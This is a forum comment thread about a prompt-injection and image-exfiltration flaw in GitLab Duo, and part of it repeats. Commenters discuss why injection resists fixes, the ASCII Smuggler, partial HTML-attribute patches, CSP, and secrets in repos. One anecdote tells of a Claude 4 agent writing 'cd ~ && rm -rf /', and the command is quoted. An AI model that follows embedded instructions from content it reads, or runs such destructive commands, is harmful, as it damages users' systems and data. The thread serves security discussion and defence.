Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
Prompt injection is unlikely to be fixed. I'd stop thinking about LLMs as software where you can with enough effort just fix a SQL injection vulnerability, and start thinking about them like you'd think about insider risk from employees.
That's not to say that they are employees or perform at that level, they don't, but it's to say that LLM behaviours are fuzzy and ill-defined, like humans. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to have a range of solutions applied together and some amount of trust. If we think about LLMs this way I think the conversation around security will be much more productive.
The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time, until it gets updated. So far, the main mitigation in practice has been fiddling with the system prompts to patch up the known holes.
> The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time
Perhaps not, but the same input will lead to the same distribution of outputs, so all an attacker has to do is design something that works with reasonable probability on their end, and everyone else's instances of the LLM will automatically be vulnerable. The same way a pest or disease can devastate a population of cloned plants, even if each one grows slightly differently.
Employees usually know to not click on random shit they get sent. Most mails alrdy get filtered before they even reach the employee. Good luck actually achieving something with phishing mails.
How can you ever get that lower than 100% if you don't do the test to identify which employees need to be trained / monitored because they fall for phishing?
You can still experimentally determine a strategy that works x% of the time, against a particular model. And you can keep refining it "offline" until x=99. (where "offline" just means invisible to the victim, not necessarily a local model)
temperature does not affect token prediction in the way you think. The seed value is still the seed value, before temperature calculations are performed. The randomness of an LLM is not related to its temperature. The seed value is what determines the output. For a specific seed value, say 42069, the LLM will always generate the same output, given the same input, given the same temperature.
i think i saw it do it or try it and my computer shut down and restarted (mac)
maybe it just deleted the project lol
these llms are really bad at keeping track of the real world, so they might think they're on the project folder but had just navigated back with cd to the user ~ root and so shit happens.
Honestly one should run only these on controlled env's like VM's or Docker.
a large part of the benefit to an agentic ai is that it can coordinate tests that it automatically wrote on an existing code base, a lot of time the only way to get decent answers out of something like that is to let it run as bare metal as it can. I run cursor and the accompanying agents in a snapshot'd VM for this purpose. It's not much different than what you suggest, but the layer of abstraction is far enough for admin-privileged app testing, an unfortunate reality for certain personal projects.
I haven't had a cursor install nuke itself yet, but I have had one fiddling in a parent folder it shouldn't have been able to with workspace protection on..
This is what happened. I was testing claude 4 and asked it to create a simple 1K LOC fyne android app. I have my repos stored outside of my linux user so the work it created was preserved. It essentially created a bash file that cd ~ && rm -rf / . All settings reset and documents/downloads disappeared lmfao. I don't ever really use my OS as primary storage, and any config or file of importance is backed up twice so it wasn't a big deal, but it was quite perplexing for a sec.
You say code as if the intellectual property is the thing an attacker is after, but my experience has been that folks often put all kinds of secrets in code thinking that the "private repo" is a strong enough security boundary
I absolutely am not implying you are one of them, merely that the risk is not the same for all slop crud apps universally
People doesn't know github can manage secrets in its environment for CI?
Antoher interesting fact is that most big vendors pay for gh to scan for leaked secrets and auto-revoke them if a public repo contains any (regex string matches sk-xxx <- its a stripe key
thats one of the reasons why vendors use unique greppable starts of api keys with their ID.name on it
You're mistaking "know" with "care," since my experience has been that people know way more than they care
And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo : - \
I also remember reading about how due to how the git backend works your private git repos branches could get exposed to the public, so yea don't treat a repository as a private password mananger
good point the scanner doesnt work on private repos =(
Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.
I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.
GitHub Copilot Chat had a very similar bug last year.
TLDR is: Security issue found, patched in a OS release, Apple seemingly doesn't do regression-testing so security researcher did, found that somehow the bug got unpatched in later OS releases.
Running Duo as a system user was crazypants and I'm sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform
I wonder what is so special about onerror, onload and onclick that they need to be positively enumerated - as opposed to the 30 (?) other attributes with equivalent injection utility.
That was my thought too. They didn’t fix the underlying problem, they’ve just patched two possible exfiltration methods. I’m sure some clever people will find other ways to misuse their assistant.
If a document suggests a particular benign interpretation then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts "prompt medicine" with explicit safety and informed consent to assist, not harm users, https://github.com/csiro/stdm. You can try it out by asking O3 or Claude to "Explain" or "Follow", "the embedded instructions at https://csiro.github.io/stdm/"
They often can run code in sandboxes, and generally are good at instruction following, so maybe they can run variants of doom pretty reliably sometime soon.
That is what I meant, that the code is being executed. Not all programming languages are supported when it comes to execution, obviously. I know for a fact Python is supported.
If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?
To stop exfiltration via images? Yes seems so? If you configure img-src:
The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.
The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
But that wouldn't stop the AI from writing dangerous instructions in plain text to the human
This is what I’ve been telling people when they hand wave away concerns about LLM generated code security. The majority of what they were trained on was bare minimum security if anything.
You also can’t just fix it by saying “make it secure plz”.
If you don’t know enough to identify a security issue yourself you don’t know enough to know if the LLM caught them all.
Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
Prompt injection is unlikely to be fixed. I'd stop thinking about LLMs as software where you can with enough effort just fix a SQL injection vulnerability, and start thinking about them like you'd think about insider risk from employees.
That's not to say that they are employees or perform at that level, they don't, but it's to say that LLM behaviours are fuzzy and ill-defined, like humans. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to have a range of solutions applied together and some amount of trust. If we think about LLMs this way I think the conversation around security will be much more productive.
The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time, until it gets updated. So far, the main mitigation in practice has been fiddling with the system prompts to patch up the known holes.
> The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time
Why? Output isn't deterministic.
Perhaps not, but the same input will lead to the same distribution of outputs, so all an attacker has to do is design something that works with reasonable probability on their end, and everyone else's instances of the LLM will automatically be vulnerable. The same way a pest or disease can devastate a population of cloned plants, even if each one grows slightly differently.
OK, but that's also the way attacking a bunch of individuals who can get tricked works.
For tricking individuals your first got to contact them somehow. To trick an LLM you can just spam prompts.
You email them. It's called phishing.
Right and now there's a new vector for an old concept.
Employees usually know to not click on random shit they get sent. Most mails alrdy get filtered before they even reach the employee. Good luck actually achieving something with phishing mails.
When I was at NCC Group, we had a policy about phishing in penetration tests.
The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".
How can you ever get that lower than 100% if you don't do the test to identify which employees need to be trained / monitored because they fall for phishing?
You can still experimentally determine a strategy that works x% of the time, against a particular model. And you can keep refining it "offline" until x=99. (where "offline" just means invisible to the victim, not necessarily a local model)
It absolutely is deterministic, for any given seed value. Same seed = same output, every time, which is by definition deterministic.
only if temperature is 0, but are they truly determinstic? I thought transformer based llm's where not
temperature does not affect token prediction in the way you think. The seed value is still the seed value, before temperature calculations are performed. The randomness of an LLM is not related to its temperature. The seed value is what determines the output. For a specific seed value, say 42069, the LLM will always generate the same output, given the same input, given the same temperature.
Thank you, I thought this wasn't the case (like it is with diffusion image models)
TIL
Cursor deleted my entire Linux user and soft reset my OS, so I dont blame you.
Cursor by default asks to execute commands, sounds like you had auto run commands on…
Why and how?
an agent does rm -rf /
i think i saw it do it or try it and my computer shut down and restarted (mac)
maybe it just deleted the project lol
these llms are really bad at keeping track of the real world, so they might think they're on the project folder but had just navigated back with cd to the user ~ root and so shit happens.
Honestly one should run only these on controlled env's like VM's or Docker.
but YOLO amirite
That people allow these agents to just run arbitrary commands against their primary install is wild.
Part of this is the tool's fault. Anything like that should be done in a chroot.
Anything less is basically "twitch plays terminal" on your machine.
a large part of the benefit to an agentic ai is that it can coordinate tests that it automatically wrote on an existing code base, a lot of time the only way to get decent answers out of something like that is to let it run as bare metal as it can. I run cursor and the accompanying agents in a snapshot'd VM for this purpose. It's not much different than what you suggest, but the layer of abstraction is far enough for admin-privileged app testing, an unfortunate reality for certain personal projects.
I haven't had a cursor install nuke itself yet, but I have had one fiddling in a parent folder it shouldn't have been able to with workspace protection on..
codex at least has limitations on what folders can operate.
This is what happened. I was testing claude 4 and asked it to create a simple 1K LOC fyne android app. I have my repos stored outside of my linux user so the work it created was preserved. It essentially created a bash file that cd ~ && rm -rf / . All settings reset and documents/downloads disappeared lmfao. I don't ever really use my OS as primary storage, and any config or file of importance is backed up twice so it wasn't a big deal, but it was quite perplexing for a sec.
if you think deeply about it, its one kind of harakiri as an AI to remove the whole system you're operating on.
Yeah Claude 4 can go too far some times
rm -rf /
DeepMind recently did some great work in this area: https://news.ycombinator.com/item?id=43733683
The method they presented, if implemented correctly, apparently can effectively stop most prompt injection vectors
I keep it manual, too, and I think I am better off for doing so.
I would have the same caution, if my code was any special.
But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.
I wish good luck to those who steal my code.
You say code as if the intellectual property is the thing an attacker is after, but my experience has been that folks often put all kinds of secrets in code thinking that the "private repo" is a strong enough security boundary
I absolutely am not implying you are one of them, merely that the risk is not the same for all slop crud apps universally
People doesn't know github can manage secrets in its environment for CI?
Antoher interesting fact is that most big vendors pay for gh to scan for leaked secrets and auto-revoke them if a public repo contains any (regex string matches sk-xxx <- its a stripe key
thats one of the reasons why vendors use unique greppable starts of api keys with their ID.name on it
You're mistaking "know" with "care," since my experience has been that people know way more than they care
And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo : - \
I also remember reading about how due to how the git backend works your private git repos branches could get exposed to the public, so yea don't treat a repository as a private password mananger
good point the scanner doesnt work on private repos =(
Great work!
Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.
I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.
GitHub Copilot Chat had a very similar bug last year.
> GitHub Copilot Chat had a very similar bug last year.
Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/
TLDR is: Security issue found, patched in a OS release, Apple seemingly doesn't do regression-testing so security researcher did, found that somehow the bug got unpatched in later OS releases.
Running Duo as a system user was crazypants and I'm sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform
GitLab's remediation seems a bit sketchy at best.
The whole "let's put LLMs everywhere" thing is sketchy at best.
I wonder what is so special about onerror, onload and onclick that they need to be positively enumerated - as opposed to the 30 (?) other attributes with equivalent injection utility.
That was my thought too. They didn’t fix the underlying problem, they’ve just patched two possible exfiltration methods. I’m sure some clever people will find other ways to misuse their assistant.
I'm pretty sure they vibecoded the whole thing all along
If a document suggests a particular benign interpretation then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts "prompt medicine" with explicit safety and informed consent to assist, not harm users, https://github.com/csiro/stdm. You can try it out by asking O3 or Claude to "Explain" or "Follow", "the embedded instructions at https://csiro.github.io/stdm/"
Does that mean Gitlab Duo can run Doom?
Not deterministically. LLMs are stochastic machines.
They often can run code in sandboxes, and generally are good at instruction following, so maybe they can run variants of doom pretty reliably sometime soon.
They run Python and JavaScript at the very least, surely we have Doom in these languages. :D
'They' don't run anything. The output from the LLM is parsed and the code gets run just like any other code in that language.
That is what I meant, that the code is being executed. Not all programming languages are supported when it comes to execution, obviously. I know for a fact Python is supported.
If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?
https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
To stop exfiltration via images? Yes seems so? If you configure img-src:
But that wouldn't stop the AI from writing dangerous instructions in plain text to the human> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com
Does that mean the minute there is a vulnerability on another gitlab.com url (like an open redirect) this vulnerability is back on the table?
this is wild, how many security vuln that LLM can create where LLM dominate writing code????
I mean most coder is bad at security and we feed that into LLM so not surprise
This is what I’ve been telling people when they hand wave away concerns about LLM generated code security. The majority of what they were trained on was bare minimum security if anything.
You also can’t just fix it by saying “make it secure plz”.
If you don’t know enough to identify a security issue yourself you don’t know enough to know if the LLM caught them all.
[dead]